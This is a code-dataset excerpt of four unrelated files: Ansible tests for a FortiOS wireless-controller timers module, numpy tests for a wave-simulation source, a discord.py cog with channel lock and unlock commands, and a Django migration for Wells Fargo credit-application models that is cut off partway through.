8f5a418119a4e521375f320968db579339a187b3 | 9,376 | py | Python | v6.0.5/wireless_controller/test_fortios_wireless_controller_timers.py | fortinet-solutions-cse/ansible_fgt_modules | c45fba49258d7c9705e7a8fd9c2a09ea4c8a4719 | [
"Apache-2.0"
] | 14 | 2018-09-25T20:35:25.000Z | 2021-07-14T04:30:54.000Z | v6.0.5/wireless_controller/test_fortios_wireless_controller_timers.py | fortinet-solutions-cse/ansible_fgt_modules | c45fba49258d7c9705e7a8fd9c2a09ea4c8a4719 | [
"Apache-2.0"
] | 32 | 2018-10-09T04:13:42.000Z | 2020-05-11T07:20:28.000Z | v6.0.5/wireless_controller/test_fortios_wireless_controller_timers.py | fortinet-solutions-cse/ansible_fgt_modules | c45fba49258d7c9705e7a8fd9c2a09ea4c8a4719 | [
"Apache-2.0"
] | 11 | 2018-10-09T00:14:53.000Z | 2021-11-03T10:54:09.000Z | # Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <https://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import pytest
from mock import ANY
from ansible.module_utils.network.fortios.fortios import FortiOSHandler
try:
from ansible.modules.network.fortios import fortios_wireless_controller_timers
except ImportError:
pytest.skip("Could not load required modules for testing", allow_module_level=True)
@pytest.fixture(autouse=True)
def connection_mock(mocker):
connection_class_mock = mocker.patch('ansible.modules.network.fortios.fortios_wireless_controller_timers.Connection')
return connection_class_mock
fos_instance = FortiOSHandler(connection_mock)
def test_wireless_controller_timers_creation(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'wireless_controller_timers': {
'ble_scan_report_intv': '3',
'client_idle_timeout': '4',
'darrp_day': 'sunday',
'darrp_optimize': '6',
'discovery_interval': '7',
'echo_interval': '8',
'fake_ap_log': '9',
'ipsec_intf_cleanup': '10',
'radio_stats_interval': '11',
'rogue_ap_log': '12',
'sta_capability_interval': '13',
'sta_locate_timer': '14',
'sta_stats_interval': '15',
'vap_stats_interval': '16'
},
'vdom': 'root'}
is_error, changed, response = fortios_wireless_controller_timers.fortios_wireless_controller(input_data, fos_instance)
expected_data = {
'ble-scan-report-intv': '3',
'client-idle-timeout': '4',
'darrp-day': 'sunday',
'darrp-optimize': '6',
'discovery-interval': '7',
'echo-interval': '8',
'fake-ap-log': '9',
'ipsec-intf-cleanup': '10',
'radio-stats-interval': '11',
'rogue-ap-log': '12',
'sta-capability-interval': '13',
'sta-locate-timer': '14',
'sta-stats-interval': '15',
'vap-stats-interval': '16'
}
set_method_mock.assert_called_with('wireless-controller', 'timers', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
def test_wireless_controller_timers_creation_fails(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'wireless_controller_timers': {
'ble_scan_report_intv': '3',
'client_idle_timeout': '4',
'darrp_day': 'sunday',
'darrp_optimize': '6',
'discovery_interval': '7',
'echo_interval': '8',
'fake_ap_log': '9',
'ipsec_intf_cleanup': '10',
'radio_stats_interval': '11',
'rogue_ap_log': '12',
'sta_capability_interval': '13',
'sta_locate_timer': '14',
'sta_stats_interval': '15',
'vap_stats_interval': '16'
},
'vdom': 'root'}
is_error, changed, response = fortios_wireless_controller_timers.fortios_wireless_controller(input_data, fos_instance)
expected_data = {
'ble-scan-report-intv': '3',
'client-idle-timeout': '4',
'darrp-day': 'sunday',
'darrp-optimize': '6',
'discovery-interval': '7',
'echo-interval': '8',
'fake-ap-log': '9',
'ipsec-intf-cleanup': '10',
'radio-stats-interval': '11',
'rogue-ap-log': '12',
'sta-capability-interval': '13',
'sta-locate-timer': '14',
'sta-stats-interval': '15',
'vap-stats-interval': '16'
}
set_method_mock.assert_called_with('wireless-controller', 'timers', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 500
def test_wireless_controller_timers_idempotent(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'DELETE', 'http_status': 404}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'wireless_controller_timers': {
'ble_scan_report_intv': '3',
'client_idle_timeout': '4',
'darrp_day': 'sunday',
'darrp_optimize': '6',
'discovery_interval': '7',
'echo_interval': '8',
'fake_ap_log': '9',
'ipsec_intf_cleanup': '10',
'radio_stats_interval': '11',
'rogue_ap_log': '12',
'sta_capability_interval': '13',
'sta_locate_timer': '14',
'sta_stats_interval': '15',
'vap_stats_interval': '16'
},
'vdom': 'root'}
is_error, changed, response = fortios_wireless_controller_timers.fortios_wireless_controller(input_data, fos_instance)
expected_data = {
'ble-scan-report-intv': '3',
'client-idle-timeout': '4',
'darrp-day': 'sunday',
'darrp-optimize': '6',
'discovery-interval': '7',
'echo-interval': '8',
'fake-ap-log': '9',
'ipsec-intf-cleanup': '10',
'radio-stats-interval': '11',
'rogue-ap-log': '12',
'sta-capability-interval': '13',
'sta-locate-timer': '14',
'sta-stats-interval': '15',
'vap-stats-interval': '16'
}
set_method_mock.assert_called_with('wireless-controller', 'timers', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 404
def test_wireless_controller_timers_filter_foreign_attributes(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'wireless_controller_timers': {
'random_attribute_not_valid': 'tag',
'ble_scan_report_intv': '3',
'client_idle_timeout': '4',
'darrp_day': 'sunday',
'darrp_optimize': '6',
'discovery_interval': '7',
'echo_interval': '8',
'fake_ap_log': '9',
'ipsec_intf_cleanup': '10',
'radio_stats_interval': '11',
'rogue_ap_log': '12',
'sta_capability_interval': '13',
'sta_locate_timer': '14',
'sta_stats_interval': '15',
'vap_stats_interval': '16'
},
'vdom': 'root'}
is_error, changed, response = fortios_wireless_controller_timers.fortios_wireless_controller(input_data, fos_instance)
expected_data = {
'ble-scan-report-intv': '3',
'client-idle-timeout': '4',
'darrp-day': 'sunday',
'darrp-optimize': '6',
'discovery-interval': '7',
'echo-interval': '8',
'fake-ap-log': '9',
'ipsec-intf-cleanup': '10',
'radio-stats-interval': '11',
'rogue-ap-log': '12',
'sta-capability-interval': '13',
'sta-locate-timer': '14',
'sta-stats-interval': '15',
'vap-stats-interval': '16'
}
set_method_mock.assert_called_with('wireless-controller', 'timers', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
| 36.625 | 133 | 0.62756 | 1,079 | 9,376 | 5.182576 | 0.180723 | 0.055794 | 0.077253 | 0.040236 | 0.813662 | 0.795422 | 0.764485 | 0.764485 | 0.764485 | 0.764485 | 0 | 0.026396 | 0.232295 | 9,376 | 255 | 134 | 36.768627 | 0.750486 | 0.070819 | 0 | 0.834146 | 0 | 0 | 0.37983 | 0.104301 | 0 | 0 | 0 | 0 | 0.117073 | 1 | 0.02439 | false | 0 | 0.039024 | 0 | 0.068293 | 0.004878 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
710c387dd0c4e98cd7fcfac2fb365150b1583a48 | 3,316 | py | Python | waver/simulation/_tests/test_source.py | neuromusic/waver | 32eeab34fd46a4855f8ead12390b65da6af61457 | [
"BSD-3-Clause"
] | 3 | 2021-07-26T12:44:00.000Z | 2022-03-20T15:49:31.000Z | waver/simulation/_tests/test_source.py | neuromusic/waver | 32eeab34fd46a4855f8ead12390b65da6af61457 | [
"BSD-3-Clause"
] | 6 | 2021-07-09T06:21:37.000Z | 2022-01-20T21:39:19.000Z | waver/simulation/_tests/test_source.py | neuromusic/waver | 32eeab34fd46a4855f8ead12390b65da6af61457 | [
"BSD-3-Clause"
] | 1 | 2021-12-21T03:47:38.000Z | 2021-12-21T03:47:38.000Z | import numpy as np
from waver.simulation._source import Source
def test_source():
"""Test instantiating a source object."""
location = (None, None)
shape = (2, 2)
spacing = 0.1
weight = np.ones((2, 2))
source = Source(location=location,
shape=shape,
spacing=spacing,
period=0.1,
phase=0,
ncycles=None)
assert np.all(source.weight == weight)
assert source.period == 0.1
assert source.phase == 0
assert source.ncycles is None
np.testing.assert_array_equal(source.weight, weight)
# Test keypoints from first wave is on sine curve
np.testing.assert_almost_equal(source.profile(0), 0)
np.testing.assert_almost_equal(source.profile(0.025), 1)
np.testing.assert_almost_equal(source.profile(0.05), 0)
np.testing.assert_almost_equal(source.profile(0.1), 0)
# Test keypoints from 11th wave is on sine curve
np.testing.assert_almost_equal(source.profile(1), 0)
np.testing.assert_almost_equal(source.profile(1.025), 1)
np.testing.assert_almost_equal(source.profile(1.05), 0)
np.testing.assert_almost_equal(source.profile(1.1), 0)
# Test full value is correct
np.testing.assert_almost_equal(source.value(0), 0 * weight)
np.testing.assert_almost_equal(source.value(0.025), weight)
def test_pulsed_source():
"""Test instantiating a source object."""
location = (None, None)
shape = (2, 2)
spacing = 0.1
weight = np.ones((2, 2))
source = Source(location=location,
shape=shape,
spacing=spacing,
period=0.1,
phase=0,
ncycles=5)
assert np.all(source.weight == weight)
assert source.period == 0.1
assert source.phase == 0
assert source.ncycles == 5
# Test keypoints from first wave is on sine curve
np.testing.assert_almost_equal(source.profile(0), 0)
np.testing.assert_almost_equal(source.profile(0.025), 1)
np.testing.assert_almost_equal(source.profile(0.05), 0)
np.testing.assert_almost_equal(source.profile(0.1), 0)
# Test keypoints from 11th wave are now zero
np.testing.assert_almost_equal(source.profile(1), 0)
np.testing.assert_almost_equal(source.profile(1.025), 0)
np.testing.assert_almost_equal(source.profile(1.05), 0)
np.testing.assert_almost_equal(source.profile(1.1), 0)
def test_spatial_source():
"""Test instantiating a source object."""
location = (0, None)
shape = (2, 2)
spacing = 0.1
weight = np.zeros((2, 2))
weight[0] = 1
source = Source(location=location,
shape=shape,
spacing=spacing,
period=0.1,
phase=0,
ncycles=None)
assert np.all(source.weight == weight)
assert source.period == 0.1
assert source.phase == 0
assert source.ncycles is None
# Test keypoints from first wave is on sine curve
np.testing.assert_almost_equal(source.profile(0), 0)
np.testing.assert_almost_equal(source.profile(0.025), 1)
# Test full value is correct
np.testing.assert_almost_equal(source.value(0), 0 * weight)
np.testing.assert_almost_equal(source.value(0.025), weight) | 33.836735 | 63 | 0.637817 | 462 | 3,316 | 4.465368 | 0.112554 | 0.100339 | 0.167232 | 0.223946 | 0.923897 | 0.923897 | 0.923897 | 0.902569 | 0.902569 | 0.888027 | 0 | 0.048077 | 0.247286 | 3,316 | 98 | 64 | 33.836735 | 0.778446 | 0.119421 | 0 | 0.816901 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.492958 | 1 | 0.042254 | false | 0 | 0.028169 | 0 | 0.070423 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
7123463110b739f18db3c7ac922f62d8bc39c64c | 4,326 | py | Python | Collection/Anubis/cogs/raid prevention.py | Vexvain/Discord-Collection | 90d68054b57f05d8f6860775dce8c5699001a2f7 | [
"MIT"
] | 1 | 2021-09-07T17:35:23.000Z | 2021-09-07T17:35:23.000Z | Collection/Anubis/cogs/raid prevention.py | Vexvain/Discord-Collection | 90d68054b57f05d8f6860775dce8c5699001a2f7 | [
"MIT"
] | null | null | null | Collection/Anubis/cogs/raid prevention.py | Vexvain/Discord-Collection | 90d68054b57f05d8f6860775dce8c5699001a2f7 | [
"MIT"
] | 2 | 2021-01-19T02:30:03.000Z | 2021-11-18T01:23:38.000Z | import discord
from discord.ext import commands
class RaidPrevention(commands.Cog):
def __init__(self, bot):
self.bot = bot
# add a member from an "anti-raid database"
@commands.command()
@commands.has_guild_permissions(administrator=True)
async def db_add_member(self, ctx, member: discord.Member, *, reason=None):
try:
embed = discord.Embed(
title="Member added",
description=f"{member.mention} has been added to the database.",
color=discord.Color.blue())
await ctx.send(embed=embed)
except BaseException:
embed = discord.Embed(
title="Issue",
description=f"{member} is not currently on this server.",
color=discord.Color.orange())
await ctx.send(embed=embed)
# remove a member from an "anti-raid database"
@commands.command()
@commands.has_guild_permissions(administrator=True)
async def db_del_member(self, ctx, member: discord.Member, *, reason=None):
try:
embed = discord.Embed(
title="Member removed",
description=f"{member.mention} has been removed from the database.",
color=discord.Color.blue())
await ctx.send(embed=embed)
except BaseException:
embed = discord.Embed(
title="Issue",
description=f"{member} is not currently on this server.",
color=discord.Color.orange())
await ctx.send(embed=embed)
# lock channel
@commands.command()
@commands.guild_only()
@commands.has_guild_permissions(manage_channels=True)
@commands.bot_has_guild_permissions(manage_channels=True)
async def lock(self, ctx, channel: discord.TextChannel = None):
channel = channel or ctx.channel
if ctx.guild.default_role not in channel.overwrites:
overwrites = {ctx.guild.default_role: discord.PermissionOverwrite(
send_messages=False)}
await channel.edit(overwrites=overwrites)
embed = discord.Embed(
title="Channel locked",
description=f"{channel.name} has been locked down.",
color=discord.Color.blue())
await ctx.send(embed=embed)
elif channel.overwrites[ctx.guild.default_role].send_messages or channel.overwrites[ctx.guild.default_role].send_messages is None:
overwrites = channel.overwrites[ctx.guild.default_role]
overwrites.send_messages = False
await channel.set_permissions(ctx.guild.default_role, overwrite=overwrites)
embed = discord.Embed(
title="Channel locked",
description=f"{channel.name} has been locked down.",
color=discord.Color.blue())
await ctx.send(embed=embed)
# unlock channel
@commands.command()
@commands.guild_only()
@commands.has_guild_permissions(manage_channels=True)
@commands.bot_has_guild_permissions(manage_channels=True)
async def unlock(self, ctx, channel: discord.TextChannel = None):
channel = channel or ctx.channel
if ctx.guild.default_role not in channel.overwrites:
overwrites = {
ctx.guild.default_role: discord.PermissionOverwrite(
send_messages=True)}
await channel.edit(overwrites=overwrites)
embed = discord.Embed(
title="Channel unlocked",
description=f"{channel.name} has been unlocked.",
color=discord.Color.blue())
await ctx.send(embed=embed)
elif channel.overwrites[ctx.guild.default_role].send_messages is None or channel.overwrites[ctx.guild.default_role].send_messages == False:
overwrites = channel.overwrites[ctx.guild.default_role]
overwrites.send_messages = True
await channel.set_permissions(ctx.guild.default_role, overwrite=overwrites)
embed = discord.Embed(
title="Channel unlocked",
description=f"{channel.name} has been unlocked.",
color=discord.Color.blue())
await ctx.send(embed=embed)
def setup(bot):
bot.add_cog(RaidPrevention(bot))
| 41.2 | 147 | 0.624827 | 477 | 4,326 | 5.559748 | 0.171908 | 0.036199 | 0.067873 | 0.085973 | 0.923831 | 0.917044 | 0.892911 | 0.892911 | 0.892911 | 0.873303 | 0 | 0 | 0.277855 | 4,326 | 104 | 148 | 41.596154 | 0.848912 | 0.026352 | 0 | 0.72093 | 0 | 0 | 0.098883 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.023256 | false | 0 | 0.023256 | 0 | 0.05814 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8570b25cc2a5e951172ae366ebaa0ad7ee8c8ea3 | 66,461 | py | Python | src/wellsfargo/migrations/0001_squash_060.py | thelabnyc/django-oscar-wfrs | 9abd4ecbdafd597407fdf60657103cb5d29c4c8b | [
"0BSD"
] | 1 | 2021-02-08T05:54:56.000Z | 2021-02-08T05:54:56.000Z | src/wellsfargo/migrations/0001_squash_060.py | thelabnyc/django-oscar-wfrs | 9abd4ecbdafd597407fdf60657103cb5d29c4c8b | [
"0BSD"
] | 24 | 2019-12-04T21:37:01.000Z | 2022-03-11T23:16:20.000Z | src/wellsfargo/migrations/0001_squash_060.py | thelabnyc/django-oscar-wfrs | 9abd4ecbdafd597407fdf60657103cb5d29c4c8b | [
"0BSD"
] | 2 | 2016-05-31T10:02:35.000Z | 2016-12-19T11:29:37.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-03-01 21:38
from __future__ import unicode_literals
from decimal import Decimal
from django.conf import settings
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
import localflavor.us.models
import wellsfargo.core.fields
import oscar.models.fields
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
("auth", "0006_require_contenttypes_0002"),
(
"offer",
"0006_bluelightabsolutediscountbenefit_bluelightcountcondition_bluelightcoveragecondition_bluelightfixedpr",
),
]
operations = [
migrations.CreateModel(
name="APICredentials",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"username",
models.CharField(max_length=200, verbose_name="WFRS API Username"),
),
(
"password",
models.CharField(max_length=200, verbose_name="WFRS API Password"),
),
(
"merchant_num",
models.CharField(
max_length=200, verbose_name="WFRS API Merchant Number"
),
),
(
"priority",
models.IntegerField(default=1, verbose_name="Priority Order"),
),
(
"user_group",
models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.CASCADE,
to="auth.Group",
),
),
],
options={
"verbose_name": "API Credentials",
"verbose_name_plural": "API Credentials",
"ordering": ("-priority", "-id"),
},
),
migrations.CreateModel(
name="CACreditApp",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"region",
models.CharField(
choices=[("US", "United States"), ("CA", "Canada")],
default="US",
max_length=15,
verbose_name="Region",
),
),
(
"language",
models.CharField(
choices=[("E", "English"), ("F", "French")],
default="E",
max_length=1,
verbose_name="Language",
),
),
(
"app_type",
models.CharField(
choices=[("I", "Individual"), ("J", "Joint")],
default="I",
max_length=1,
verbose_name="Application Type",
),
),
(
"purchase_price",
models.IntegerField(
blank=True,
null=True,
validators=[
django.core.validators.MinValueValidator(0),
django.core.validators.MaxValueValidator(99999),
],
verbose_name="Requested Credit Amount",
),
),
(
"main_first_name",
models.CharField(max_length=15, verbose_name="First Name"),
),
(
"main_last_name",
models.CharField(max_length=20, verbose_name="Last Name"),
),
(
"main_middle_initial",
models.CharField(
blank=True,
max_length=1,
null=True,
verbose_name="Middle Initial",
),
),
(
"main_date_of_birth",
wellsfargo.core.fields.DateOfBirthField(
null=True, verbose_name="Date of Birth"
),
),
(
"main_address_line1",
models.CharField(max_length=35, verbose_name="Address Line 1"),
),
(
"main_address_line2",
models.CharField(
blank=True,
max_length=35,
null=True,
verbose_name="Address Line 2",
),
),
(
"main_address_city",
models.CharField(max_length=15, verbose_name="City"),
),
(
"main_home_value",
models.IntegerField(
blank=True,
null=True,
validators=[
django.core.validators.MinValueValidator(0),
django.core.validators.MaxValueValidator(9999999),
],
verbose_name="Home Value",
),
),
(
"main_mortgage_balance",
models.IntegerField(
blank=True,
null=True,
validators=[
django.core.validators.MinValueValidator(0),
django.core.validators.MaxValueValidator(9999999),
],
verbose_name="Mortgage Balance",
),
),
(
"main_annual_income",
models.IntegerField(
validators=[
django.core.validators.MinValueValidator(0),
django.core.validators.MaxValueValidator(999999),
],
verbose_name="Annual Income",
),
),
(
"insurance",
models.BooleanField(
default=False, verbose_name="Optional Insurance"
),
),
(
"sales_person_id",
models.CharField(
blank=True,
max_length=4,
null=True,
validators=[
django.core.validators.MinLengthValidator(4),
django.core.validators.MaxLengthValidator(4),
],
verbose_name="Existing Sales Person ID",
),
),
(
"new_sales_person",
models.CharField(
blank=True,
max_length=10,
null=True,
verbose_name="New Sales Person Name",
),
),
("email", models.EmailField(max_length=80, verbose_name="Email")),
("created_datetime", models.DateTimeField(auto_now_add=True)),
("modified_datetime", models.DateTimeField(auto_now=True)),
(
"main_ssn",
models.CharField(
max_length=50,
blank=True,
null=True,
verbose_name="Social Insurance Number",
),
),
(
"main_address_state",
models.CharField(max_length=2, verbose_name="Province"),
),
(
"main_address_postcode",
models.CharField(max_length=10, verbose_name="Postcode"),
),
(
"main_home_phone",
oscar.models.fields.PhoneNumberField(verbose_name="Home Phone"),
),
(
"main_time_at_address",
models.CharField(
max_length=4,
validators=[
django.core.validators.MinLengthValidator(4),
django.core.validators.MaxLengthValidator(4),
django.core.validators.RegexValidator("^[0-9]{4}$"),
],
verbose_name="Time at Address",
),
),
(
"main_housing_status",
models.CharField(
choices=[("R", "Rent"), ("O", "Own")],
max_length=3,
verbose_name="Housing Status",
),
),
(
"main_employer_name",
models.CharField(max_length=30, verbose_name="Employer Name"),
),
(
"main_time_at_employer",
models.CharField(
max_length=4,
validators=[
django.core.validators.MinLengthValidator(4),
django.core.validators.MaxLengthValidator(4),
django.core.validators.RegexValidator("^[0-9]{4}$"),
],
verbose_name="Time at Employer",
),
),
(
"main_employer_phone",
oscar.models.fields.PhoneNumberField(
verbose_name="Employer Phone Number"
),
),
(
"main_cell_phone",
oscar.models.fields.PhoneNumberField(
blank=True, null=True, verbose_name="Cell Phone"
),
),
(
"main_occupation",
models.CharField(max_length=24, verbose_name="Occupation"),
),
(
"main_photo_id_type",
models.CharField(
choices=[
("OA", "Old Age Security Card"),
("DL", "Driver’s License"),
("PI", "Provincial ID"),
("PA", "Canadian Passport"),
("CN", "Certificate of Citizenship or Naturalization"),
("IS", "Certificate of Indian Status"),
("CC", "Canadian Citizen Form 1000 or 1442"),
],
max_length=2,
verbose_name="Photo ID Type",
),
),
(
"main_photo_id_number",
models.CharField(
max_length=4,
validators=[
django.core.validators.MinLengthValidator(4),
django.core.validators.MaxLengthValidator(4),
],
verbose_name="Photo ID Number",
),
),
(
"main_drivers_license_province",
models.CharField(
max_length=2,
blank=True,
null=True,
verbose_name="Driver’s License Province",
),
),
(
"main_photo_id_expiration",
models.DateField(verbose_name="Photo ID Expiration Date"),
),
(
"submitting_user",
models.ForeignKey(
blank=True,
help_text="Select the user who filled out and submitted the credit application (not always the same as the user who is applying for credit).",
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to=settings.AUTH_USER_MODEL,
verbose_name="Submitting User",
),
),
(
"user",
models.ForeignKey(
blank=True,
help_text="Select the user user who is applying and who will own (be the primary user of) this account.",
null=True,
on_delete=django.db.models.deletion.CASCADE,
related_name="ca_individual_credit_apps",
to=settings.AUTH_USER_MODEL,
verbose_name="Owner",
),
),
(
"last4_account_number",
models.CharField(
blank=True,
max_length=4,
null=True,
verbose_name="Resulting Account",
),
),
],
options={
"verbose_name": "CA Individual Credit Application",
"verbose_name_plural": "CA Individual Credit Applications",
"abstract": False,
},
),
migrations.CreateModel(
name="CAJointCreditApp",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"region",
models.CharField(
choices=[("US", "United States"), ("CA", "Canada")],
default="US",
max_length=15,
verbose_name="Region",
),
),
(
"language",
models.CharField(
choices=[("E", "English"), ("F", "French")],
default="E",
max_length=1,
verbose_name="Language",
),
),
(
"app_type",
models.CharField(
choices=[("I", "Individual"), ("J", "Joint")],
default="I",
max_length=1,
verbose_name="Application Type",
),
),
(
"purchase_price",
models.IntegerField(
blank=True,
null=True,
validators=[
django.core.validators.MinValueValidator(0),
django.core.validators.MaxValueValidator(99999),
],
verbose_name="Requested Credit Amount",
),
),
(
"main_first_name",
models.CharField(max_length=15, verbose_name="First Name"),
),
(
"main_last_name",
models.CharField(max_length=20, verbose_name="Last Name"),
),
(
"main_middle_initial",
models.CharField(
blank=True,
max_length=1,
null=True,
verbose_name="Middle Initial",
),
),
(
"main_date_of_birth",
wellsfargo.core.fields.DateOfBirthField(
null=True, verbose_name="Date of Birth"
),
),
(
"main_address_line1",
models.CharField(max_length=35, verbose_name="Address Line 1"),
),
(
"main_address_line2",
models.CharField(
blank=True,
max_length=35,
null=True,
verbose_name="Address Line 2",
),
),
(
"main_address_city",
models.CharField(max_length=15, verbose_name="City"),
),
(
"main_home_value",
models.IntegerField(
blank=True,
null=True,
validators=[
django.core.validators.MinValueValidator(0),
django.core.validators.MaxValueValidator(9999999),
],
verbose_name="Home Value",
),
),
(
"main_mortgage_balance",
models.IntegerField(
blank=True,
null=True,
validators=[
django.core.validators.MinValueValidator(0),
django.core.validators.MaxValueValidator(9999999),
],
verbose_name="Mortgage Balance",
),
),
(
"main_annual_income",
models.IntegerField(
validators=[
django.core.validators.MinValueValidator(0),
django.core.validators.MaxValueValidator(999999),
],
verbose_name="Annual Income",
),
),
(
"insurance",
models.BooleanField(
default=False, verbose_name="Optional Insurance"
),
),
(
"sales_person_id",
models.CharField(
blank=True,
max_length=4,
null=True,
validators=[
django.core.validators.MinLengthValidator(4),
django.core.validators.MaxLengthValidator(4),
],
verbose_name="Existing Sales Person ID",
),
),
(
"new_sales_person",
models.CharField(
blank=True,
max_length=10,
null=True,
verbose_name="New Sales Person Name",
),
),
("email", models.EmailField(max_length=80, verbose_name="Email")),
("created_datetime", models.DateTimeField(auto_now_add=True)),
("modified_datetime", models.DateTimeField(auto_now=True)),
(
"joint_first_name",
models.CharField(max_length=15, verbose_name="First Name"),
),
(
"joint_last_name",
models.CharField(max_length=20, verbose_name="Last Name"),
),
(
"joint_middle_initial",
models.CharField(
blank=True,
max_length=1,
null=True,
verbose_name="Middle Initial",
),
),
(
"joint_date_of_birth",
wellsfargo.core.fields.DateOfBirthField(
null=True, verbose_name="Date of Birth"
),
),
(
"joint_address_line1",
models.CharField(max_length=35, verbose_name="Address Line 1"),
),
(
"joint_address_line2",
models.CharField(
blank=True,
max_length=35,
null=True,
verbose_name="Address Line 2",
),
),
(
"joint_address_city",
models.CharField(max_length=15, verbose_name="City"),
),
(
"joint_annual_income",
models.IntegerField(
validators=[
django.core.validators.MinValueValidator(0),
django.core.validators.MaxValueValidator(999999),
],
verbose_name="Annual Income",
),
),
(
"main_ssn",
models.CharField(
max_length=50,
blank=True,
null=True,
verbose_name="Social Insurance Number",
),
),
(
"main_address_state",
models.CharField(max_length=2, verbose_name="Province"),
),
(
"main_address_postcode",
models.CharField(max_length=10, verbose_name="Postcode"),
),
(
"main_home_phone",
oscar.models.fields.PhoneNumberField(verbose_name="Home Phone"),
),
(
"main_time_at_address",
models.CharField(
max_length=4,
validators=[
django.core.validators.MinLengthValidator(4),
django.core.validators.MaxLengthValidator(4),
django.core.validators.RegexValidator("^[0-9]{4}$"),
],
verbose_name="Time at Address",
),
),
(
"main_housing_status",
models.CharField(
choices=[("R", "Rent"), ("O", "Own")],
max_length=3,
verbose_name="Housing Status",
),
),
(
"main_employer_name",
models.CharField(max_length=30, verbose_name="Employer Name"),
),
(
"main_time_at_employer",
models.CharField(
max_length=4,
validators=[
django.core.validators.MinLengthValidator(4),
django.core.validators.MaxLengthValidator(4),
django.core.validators.RegexValidator("^[0-9]{4}$"),
],
verbose_name="Time at Employer",
),
),
(
"main_employer_phone",
oscar.models.fields.PhoneNumberField(
verbose_name="Employer Phone Number"
),
),
(
"main_cell_phone",
oscar.models.fields.PhoneNumberField(
blank=True, null=True, verbose_name="Cell Phone"
),
),
(
"main_occupation",
models.CharField(max_length=24, verbose_name="Occupation"),
),
(
"main_photo_id_type",
models.CharField(
choices=[
("OA", "Old Age Security Card"),
("DL", "Driver’s License"),
("PI", "Provincial ID"),
("PA", "Canadian Passport"),
("CN", "Certificate of Citizenship or Naturalization"),
("IS", "Certificate of Indian Status"),
("CC", "Canadian Citizen Form 1000 or 1442"),
],
max_length=2,
verbose_name="Photo ID Type",
),
),
(
"main_photo_id_number",
models.CharField(
max_length=4,
validators=[
django.core.validators.MinLengthValidator(4),
django.core.validators.MaxLengthValidator(4),
],
verbose_name="Photo ID Number",
),
),
(
"main_drivers_license_province",
models.CharField(
max_length=2,
blank=True,
null=True,
verbose_name="Driver’s License Province",
),
),
(
"main_photo_id_expiration",
models.DateField(verbose_name="Photo ID Expiration Date"),
),
(
"joint_ssn",
models.CharField(
max_length=50,
blank=True,
null=True,
verbose_name="Social Insurance Number",
),
),
(
"joint_address_state",
models.CharField(max_length=2, verbose_name="Province"),
),
(
